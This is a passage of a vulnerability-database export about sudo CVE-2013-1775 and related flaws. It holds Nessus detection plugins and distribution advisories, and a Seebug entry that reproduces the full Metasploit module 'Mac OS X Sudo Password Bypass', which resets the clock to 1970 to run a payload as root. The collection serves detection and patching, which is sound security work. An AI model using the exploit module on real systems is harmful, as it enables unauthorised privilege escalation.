user names properly. Consequently, if a system used sudo\nintegrated with LDAP or Active Directory (AD) as the primary\nauthentication mechanism, users were not able to authenticate on that\nsystem. With this update, sudo has been modified to process LDAP and\nAD names correctly and the authentication process now works as\nexpected. (BZ#869287)\n\n* Prior to this update, the 'visudo -s (strict)' command incorrectly\nparsed certain alias definitions. Consequently, an error message was\nissued. The bug has been fixed, and parsing errors no longer occur\nwhen using 'visudo\n\n* s'. (BZ#905624)\n\nAll sudo users are advised to upgrade to this updated package, which\ncontains backported patches to correct these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2013:1353\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-1776\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-1775\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-2776\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected sudo and / or sudo-debuginfo packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Mac OS X Sudo Password Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:sudo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:sudo-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/03/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/09/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/10/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2013:1353\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"sudo-1.7.2p1-28.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"sudo-1.7.2p1-28.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"sudo-1.7.2p1-28.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"sudo-debuginfo-1.7.2p1-28.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"sudo-debuginfo-1.7.2p1-28.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"sudo-debuginfo-1.7.2p1-28.el5\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"sudo / sudo-debuginfo\");\n }\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T01:18:39", "description": "A flaw was found in the way sudo handled time stamp files. An attacker\nable to run code as a local user and with the ability to control the\nsystem clock could possibly gain additional privileges by running\ncommands that the victim user was allowed to run via sudo, without\nknowing the victim's password. (CVE-2013-1775)\n\nIt was found that sudo did not properly validate the controlling\nterminal device when the tty_tickets option was enabled in the\n/etc/sudoers file. An attacker able to run code as a local user could\npossibly gain additional privileges by running commands that the\nvictim user was allowed to run via sudo, without knowing the victim's\npassword. (CVE-2013-2776 , CVE-2013-2777)", "edition": 24, "published": "2013-12-14T00:00:00", "title": "Amazon Linux AMI : sudo (ALAS-2013-259)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1775", "CVE-2013-2777", "CVE-2013-2776"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:sudo", "p-cpe:/a:amazon:linux:sudo-devel", "p-cpe:/a:amazon:linux:sudo-debuginfo", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2013-259.NASL", "href": "https://www.tenable.com/plugins/nessus/71399", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2013-259.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(71399);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2018/04/18 15:09:35\");\n\n script_cve_id(\"CVE-2013-1775\", \"CVE-2013-2776\", \"CVE-2013-2777\");\n script_xref(name:\"ALAS\", value:\"2013-259\");\n script_xref(name:\"RHSA\", value:\"2013:1701\");\n\n script_name(english:\"Amazon Linux AMI : sudo (ALAS-2013-259)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A flaw was found in the way sudo handled time stamp files. An attacker\nable to run code as a local user and with the ability to control the\nsystem clock could possibly gain additional privileges by running\ncommands that the victim user was allowed to run via sudo, without\nknowing the victim's password. (CVE-2013-1775)\n\nIt was found that sudo did not properly validate the controlling\nterminal device when the tty_tickets option was enabled in the\n/etc/sudoers file. An attacker able to run code as a local user could\npossibly gain additional privileges by running commands that the\nvictim user was allowed to run via sudo, without knowing the victim's\npassword. (CVE-2013-2776 , CVE-2013-2777)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2013-259.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update sudo' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Mac OS X Sudo Password Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:sudo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:sudo-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:sudo-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/12/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/12/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"sudo-1.8.6p3-12.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"sudo-debuginfo-1.8.6p3-12.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"sudo-devel-1.8.6p3-12.17.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"sudo / sudo-debuginfo / sudo-devel\");\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "freebsd": [{"lastseen": "2019-05-29T18:33:39", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1775"], "description": "\nTodd Miller reports:\n\nThe flaw may allow someone with physical access to a machine that\n\t is not password-protected to run sudo commands without knowing the\n\t logged in user's password. On systems where sudo is the principal\n\t way of running commands as root, such as on Ubuntu and Mac OS X,\n\t there is a greater chance that the logged in user has run sudo\n\t before and thus that an attack would succeed.\n\n", "edition": 4, "modified": "2013-02-27T00:00:00", "published": "2013-02-27T00:00:00", "id": "764344FB-8214-11E2-9273-902B343DEEC9", "href": "https://vuxml.freebsd.org/freebsd/764344fb-8214-11e2-9273-902b343deec9.html", "title": "sudo -- Authentication bypass when clock is reset", "type": "freebsd", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T15:22:26", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "Mac OS X Sudo Password Bypass", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1775"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-81531", "id": "SSV:81531", "sourceData": "\n ##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n#\r\n# http://metasploit.com/\r\n##\r\nrequire 'shellwords'\r\n\r\nclass Metasploit3 < Msf::Exploit::Local\r\n\r\n # ManualRanking because it's going to modify system time\r\n # Even when it will try to restore things, user should use\r\n # it at his own risk\r\n Rank = NormalRanking\r\n\r\n include Msf::Post::Common\r\n include Msf::Post::File\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n\r\n SYSTEMSETUP_PATH = "/usr/sbin/systemsetup"\r\n SUDOER_GROUP = "admin"\r\n VULNERABLE_VERSION_RANGES = [['1.6.0', '1.7.10p6'], ['1.8.0', '1.8.6p6']]\r\n\r\n # saved clock config\r\n attr_accessor :time, :date, :networked, :zone, :network_server\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => 'Mac OS X Sudo Password Bypass',\r\n 'Description' => %q{\r\n This module gains a session with root permissions on versions of OS X with\r\n sudo binary vulnerable to CVE-2013-1775. Tested working on Mac OS 10.7-10.8.4,\r\n and possibly lower versions.\r\n\r\n If your session belongs to a user with Administrative Privileges\r\n (the user is in the sudoers file and is in the "admin group"), and the\r\n user has ever run the "sudo" command, it is possible to become the super\r\n user by running `sudo -k` and then resetting the system clock to 01-01-1970.\r\n\r\n This module will fail silently if the user is not an admin or if the user has never\r\n run the sudo command.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Todd C. Miller', # Vulnerability discovery\r\n 'joev <jvennix[at]rapid7.com>', # Metasploit module\r\n 'juan vazquez' # testing/fixing module bugs\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2013-1775' ],\r\n [ 'OSVDB', '90677' ],\r\n [ 'BID', '58203' ],\r\n [ 'URL', 'http://www.sudo.ws/sudo/alerts/epoch_ticket.html' ]\r\n ],\r\n 'Platform' => 'osx',\r\n 'Arch' => [ ARCH_X86, ARCH_X86_64, ARCH_CMD ],\r\n 'SessionTypes' => [ 'shell', 'meterpreter' ],\r\n 'Targets' => [\r\n [ 'Mac OS X x86 (Native Payload)',\r\n {\r\n 'Platform' => 'osx',\r\n 'Arch' => ARCH_X86\r\n }\r\n ],\r\n [ 'Mac OS X x64 (Native Payload)',\r\n {\r\n 'Platform' => 'osx',\r\n 'Arch' => ARCH_X86_64\r\n }\r\n ],\r\n [ 'CMD',\r\n {\r\n 'Platform' => 'unix',\r\n 'Arch' => ARCH_CMD\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Feb 28 2013'\r\n ))\r\n register_advanced_options([\r\n OptString.new('TMP_FILE',\r\n [true,'For the native targets, specifies the path that '+\r\n 'the executable will be dropped on the client machine.',\r\n '/tmp/.<random>/<random>']\r\n ),\r\n ], self.class)\r\n end\r\n\r\n # ensure target is vulnerable by checking sudo vn and checking\r\n # user is in admin group.\r\n def check\r\n if cmd_exec("sudo -V") =~ /version\\s+([^\\s]*)\\s*$/\r\n sudo_vn = $1\r\n sudo_vn_parts = sudo_vn.split(/[\\.p]/).map(&:to_i)\r\n # check vn between 1.6.0 through 1.7.10p6\r\n # and 1.8.0 through 1.8.6p6\r\n if not vn_bt(sudo_vn, VULNERABLE_VERSION_RANGES)\r\n print_error "sudo version #{sudo_vn} not vulnerable."\r\n return Exploit::CheckCode::Safe\r\n end\r\n else\r\n print_error "sudo not detected on the system."\r\n return Exploit::CheckCode::Safe\r\n end\r\n\r\n if not user_in_admin_group?\r\n print_error "sudo version is vulnerable, but user is not in the admin group (necessary to change the date)."\r\n Exploit::CheckCode::Safe\r\n end\r\n # one root for you sir\r\n Exploit::CheckCode::Vulnerable\r\n end\r\n\r\n def exploit\r\n if not user_in_admin_group?\r\n fail_with(Exploit::Failure::NotFound, "User is not in the 'admin' group, bailing.")\r\n end\r\n # "remember" the current system time/date/network/zone\r\n print_good("User is an admin, continuing...")\r\n\r\n # drop the payload (unless CMD)\r\n if using_native_target?\r\n cmd_exec("mkdir -p #{File.dirname(drop_path)}")\r\n write_file(drop_path, generate_payload_exe)\r\n register_files_for_cleanup(drop_path)\r\n cmd_exec("chmod +x #{[drop_path].shelljoin}")\r\n print_status("Payload dropped and registered for cleanup")\r\n end\r\n\r\n print_status("Saving system clock config...")\r\n @time = cmd_exec("#{SYSTEMSETUP_PATH} -gettime").match(/^time: (.*)$/i)[1]\r\n @date = cmd_exec("#{SYSTEMSETUP_PATH} -getdate").match(/^date: (.*)$/i)[1]\r\n @networked = cmd_exec("#{SYSTEMSETUP_PATH} -getusingnetworktime") =~ (/On$/)\r\n @zone = cmd_exec("#{SYSTEMSETUP_PATH} -gettimezone").match(/^time zone: (.*)$/i)[1]\r\n @network_server = if @networked\r\n cmd_exec("#{SYSTEMSETUP_PATH} -getnetworktimeserver").match(/time server: (.*)$/i)[1]\r\n end\r\n\r\n run_sudo_cmd\r\n end\r\n\r\n def cleanup\r\n print_status("Resetting system clock to original values") if @time\r\n cmd_exec("#{SYSTEMSETUP_PATH} -settimezone #{[@zone].shelljoin}") unless @zone.nil?\r\n cmd_exec("#{SYSTEMSETUP_PATH} -setdate #{[@date].shelljoin}") unless @date.nil?\r\n cmd_exec("#{SYSTEMSETUP_PATH} -settime #{[@time].shelljoin}") unless @time.nil?\r\n\r\n if @networked\r\n cmd_exec("#{SYSTEMSETUP_PATH} -setusingnetworktime On")\r\n unless @network_server.nil?\r\n cmd_exec("#{SYSTEMSETUP_PATH} -setnetworktimeserver #{[@network_server].shelljoin}")\r\n end\r\n end\r\n\r\n print_good("Completed clock reset.") if @time\r\n end\r\n\r\n private\r\n\r\n def run_sudo_cmd\r\n print_status("Resetting user's time stamp file and setting clock to the epoch")\r\n cmd_exec(\r\n "sudo -k; \\n"+\r\n "#{SYSTEMSETUP_PATH} -setusingnetworktime Off -settimezone GMT"+\r\n " -setdate 01:01:1970 -settime 00:00"\r\n )\r\n\r\n # Run Test\r\n test = rand_text_alpha(4 + rand(4))\r\n sudo_cmd_test = ['sudo', '-S', ["echo #{test}"].shelljoin].join(' ')\r\n\r\n print_status("Testing that user has sudoed before...")\r\n output = cmd_exec('echo "" | ' + sudo_cmd_test)\r\n\r\n if output =~ /incorrect password attempts\\s*$/i\r\n fail_with(Exploit::Failure::NotFound, "User has never run sudo, and is therefore not vulnerable. Bailing.")\r\n elsif output =~ /#{test}/\r\n print_good("Test executed succesfully. Running payload.")\r\n else\r\n print_error("Unknown fail while testing, trying to execute the payload anyway...")\r\n end\r\n\r\n # Run Payload\r\n sudo_cmd_raw = if using_native_target?\r\n ['sudo', '-S', [drop_path].shelljoin].join(' ')\r\n elsif using_cmd_target?\r\n ['sudo', '-S', '/bin/sh', '-c', [payload.encoded].shelljoin].join(' ')\r\n end\r\n\r\n ## to prevent the password prompt from destroying session\r\n ## backgrounding the sudo payload in order to keep both sessions usable\r\n sudo_cmd = 'echo "" | ' + sudo_cmd_raw + ' & true'\r\n\r\n print_status "Running command: "\r\n print_line sudo_cmd\r\n output = cmd_exec(sudo_cmd)\r\n\r\n end\r\n\r\n # helper methods for accessing datastore\r\n def using_native_target?; target.name =~ /native/i; end\r\n def using_cmd_target?; target.name =~ /cmd/i; end\r\n def drop_path\r\n @_drop_path ||= datastore['TMP_FILE'].gsub('<random>') { Rex::Text.rand_text_alpha(10) }\r\n end\r\n\r\n # checks that the user is in OSX's admin group, necessary to change sys clock\r\n def user_in_admin_group?\r\n cmd_exec("groups `whoami`").split(/\\s+/).include?(SUDOER_GROUP)\r\n end\r\n\r\n # helper methods for dealing with sudo's vn num\r\n def parse_vn(vn_str); vn_str.split(/[\\.p]/).map(&:to_i); end\r\n def vn_bt(vn, ranges) # e.g. ('1.7.1', [['1.7.0', '1.7.6p44']])\r\n vn_parts = parse_vn(vn)\r\n ranges.any? do |range|\r\n min_parts = parse_vn(range[0])\r\n max_parts = parse_vn(range[1])\r\n vn_parts.all? do |part|\r\n min = min_parts.shift\r\n max = max_parts.shift\r\n (min.nil? or (not part.nil? and part >= min)) and\r\n (part.nil? or (not max.nil? and part <= max))\r\n end\r\n end\r\n end\r\n\r\nend\n ", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-81531"}], "slackware": [{"lastseen": "2019-05-30T07:37:19", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1775", "CVE-2013-1776"], "description": "New sudo packages are available for Slackware 12.1, 12.2, 13.0, 13.1, 13.37,\n14.0, and -current to fix security issues.\n\n\nHere are the details from the Slackware 14.0 ChangeLog:\n\npatches/packages/sudo-1.8.6p7-i486-1_slack14.0.txz: Upgraded.\n This update fixes security issues that could allow a user to run commands\n without authenticating after the password timeout has already expired.\n Note that the vulnerability did not permit a user to run commands other\n than those allowed by the sudoers policy.\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1775\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1776\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the "Get Slack" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 12.1:\nftp://ftp.slackware.com/pub/slackware/slackware-12.1/patches/packages/sudo-1.7.10p7-i486-1_slack12.1.tgz\n\nUpdated package for Slackware 12.2:\nftp://ftp.slackware.com/pub/slackware/slackware-12.2/patches/packages/sudo-1.7.10p7-i486-1_slack12.2.tgz\n\nUpdated package for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/sudo-1.7.10p7-i486-1_slack13.0.txz\n\nUpdated package for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/sudo-1.7.10p7-x86_64-1_slack13.0.txz\n\nUpdated package for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/sudo-1.7.10p7-i486-1_slack13.1.txz\n\nUpdated package for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/sudo-1.7.10p7-x86_64-1_slack13.1.txz\n\nUpdated package for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/sudo-1.7.10p7-i486-1_slack13.37.txz\n\nUpdated package for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/sudo-1.7.10p7-x86_64-1_slack13.37.txz\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/sudo-1.8.6p7-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/sudo-1.8.6p7-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/ap/sudo-1.8.6p7-i486-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/ap/sudo-1.8.6p7-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 12.1 package:\n16e47202f5cda7a372639fa6ef304974 sudo-1.7.10p7-i486-1_slack12.1.tgz\n\nSlackware 12.2 package:\n6428965e88cac3b36a84bd3b1ab361a2 sudo-1.7.10p7-i486-1_slack12.2.tgz\n\nSlackware 13.0 package:\n0251ce11992c06ba0e55a2a3f2e79d28 sudo-1.7.10p7-i486-1_slack13.0.txz\n\nSlackware x86_64 13.0 package:\n5352a19dbfdaad232573f4beb1b1237a sudo-1.7.10p7-x86_64-1_slack13.0.txz\n\nSlackware 13.1 package:\n977a8fb54ae46ceaa037b52234f2bc2a sudo-1.7.10p7-i486-1_slack13.1.txz\n\nSlackware x86_64 13.1 package:\n4182726dc8cb4ba5b69a46daed686d04 sudo-1.7.10p7-x86_64-1_slack13.1.txz\n\nSlackware 13.37 package:\n1af20762e5895338f38787e8f493d517 sudo-1.7.10p7-i486-1_slack13.37.txz\n\nSlackware x86_64 13.37 package:\n1af6f706de63704630087e1da3721ad7 sudo-1.7.10p7-x86_64-1_slack13.37.txz\n\nSlackware 14.0 package:\nd611a1f15bb379d078e04646172a626c sudo-1.8.6p7-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\n580351ec41716ce1955468dbfaf95892 sudo-1.8.6p7-x86_64-1_slack14.0.txz\n\nSlackware -current package:\nffb4636d9f772f441925079c4312a1fc ap/sudo-1.8.6p7-i486-1.txz\n\nSlackware x86_64 -current package:\n66fa0b6eefbd9937ce7b4ac5e8c133c6 ap/sudo-1.8.6p7-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg sudo-1.8.6p7-i486-1_slack14.0.txz", "modified": "2013-03-06T20:52:08", "published": "2013-03-06T20:52:08", "id": "SSA-2013-065-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2013&m=slackware-security.517440", "type": "slackware", "title": "sudo", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "debian": [{"lastseen": "2020-11-11T13:20:10", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1775", "CVE-2013-1776"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2642-1 security@debian.org\nhttp://www.debian.org/security/ Michael Gilbert\nMarch 09, 2013 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : sudo\nVulnerability : several issues\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2013-1775 CVE-2013-1776\nDebian Bug : 701838 701839\n\nSeveral vulnerabilities have been discovered in sudo, a program designed\nto allow a sysadmin to give limited root privileges to users. The Common\nVulnerabilities and Exposures project identifies the following problems:\n\nCVE-2013-1775\n\n Marco Schoepl discovered an authentication bypass when the clock is\n set to the UNIX epoch [00:00:00 UTC on 1 January 1970].\n\nCVE-2013-1776\n\n Ryan Castellucci and James Ogden discovered aspects of an issue that\n would allow session id hijacking from another authorized tty.\n\nFor the stable distribution (squeeze), these problems have been fixed in\nversion 1.7.4p4-2.squeeze.4.\n\nFor the testing (wheezy) and unstable (sid) distributions, these problems\nhave been fixed in version 1.8.5p2-1+nmu1.\n\nWe recommend that you upgrade your sudo packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 7, "modified": "2013-03-09T08:35:57", "published": "2013-03-09T08:35:57", "id": "DEBIAN:DSA-2642-1:282D9", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2013/msg00046.html", "title": "[SECURITY] [DSA 2642-1] sudo security update", "type": "debian", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1775", "CVE-2013-1776"], "description": "Sudo (superuser do) allows a system administrator to give certain users (or groups of users) the ability to run some (or all) commands as root while logging all commands and arguments. Sudo operates on a per-command basis. It is not a replacement for the shell. Features include: the ability to restrict what commands a user may run on a per-host basis, copious logging of each command (providing a clear audit trail of who did what), a configurable timeout of the sudo command, and the ability to use the same configuration file (sudoers) on many different machines. ", "modified": "2013-03-16T01:22:34", "published": "2013-03-16T01:22:34", "id": "FEDORA:510B521DE6", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 18 Update: sudo-1.8.6p7-1.fc18", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-2337", "CVE-2013-1775", "CVE-2013-1776"], "description": "Sudo (superuser do) allows a system administrator to give certain users (or groups of users) the ability to run some (or all) commands as root while logging all commands and arguments. Sudo operates on a per-command basis. It is not a replacement for the shell. Features include: the ability to restrict what commands a user may run on a per-host basis, copious logging of each command (providing a clear audit trail of who did what), a configurable timeout of the sudo command, and the ability to use the same configuration file (sudoers) on many different machines. ", "modified": "2013-03-19T20:04:50", "published": "2013-03-19T20:04:50", "id": "FEDORA:25778215CD", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 17 Update: sudo-1.8.6p7-1.fc17", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "centos": [{"lastseen": "2019-12-20T18:26:32", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1775", "CVE-2013-2777", "CVE-2013-2776"], "description": "**CentOS Errata and Security Advisory** CESA-2013:1701\n\n\nThe sudo (superuser do) utility allows system administrators 